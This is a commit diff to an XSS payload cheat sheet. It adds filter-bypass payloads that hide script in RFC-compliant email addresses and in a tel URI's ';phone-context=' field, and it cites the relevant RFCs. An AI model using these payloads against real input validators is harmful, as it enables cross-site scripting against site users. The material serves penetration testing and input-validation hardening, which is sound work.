XSS Tel URI

2024-12-18 18:36:10 +00:00 · 2024-06-03 09:37:24 +02:00 · 2024-06-03 09:37:24 +02:00 · 2e73069238
commit 2e73069238
parent 6d3fef0df3
1 changed files with 19 additions and 7 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -775,19 +775,31 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
 ```

+
 ### Bypass email filter

-([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))
+* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
+  ```javascript
+  "><svg/onload=confirm(1)>"@x.y
+  ```
+
+* [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
+  ```javascript
+  xss@example.com(<img src='x' onerror='alert(document.location)'>)
+  ```
+
+
+### Bypass tel URI filter
+
+At least 2 RFC mention the `;phone-context=` descriptor:
+
+* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
+* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)

 ```javascript
-"><svg/onload=confirm(1)>"@x.y
+330011223344;phone-context=<script>alert(0)</script>
 ```

-([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
-
-```javascript
-xss@example.com(<img src='x' onerror='alert(document.location)'>)
-```

 ### Bypass document blacklist